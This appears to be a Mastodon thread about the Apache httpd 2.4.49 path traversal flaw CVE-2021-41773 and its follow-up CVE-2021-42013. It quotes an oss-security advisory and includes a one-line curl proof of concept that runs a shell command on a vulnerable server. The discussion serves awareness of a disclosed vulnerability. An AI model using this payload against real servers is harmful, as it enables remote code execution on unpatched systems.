Follow

Ah, that over there was the CVE-2021-41773 Apache httpd 2.4.49 with mod-cgi PoC a couple of days ago: mobile.twitter.com/hackerfanta

curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
(Slightly optimized version from down that :birdsite: thread.)

Sure been a long time since I saw one of those 🙄

ROFL!

Subject: [oss-security] CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)

It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.

@zwangseinweisung Yeah, the bug had been introduced in 2.4.49, so most distributions won't be affected.

Sign in to participate in the conversation
INFRa Mastodon

The social network of the future: No ads, no corporate surveillance, ethical design, and decentralization! Own your data with Mastodon!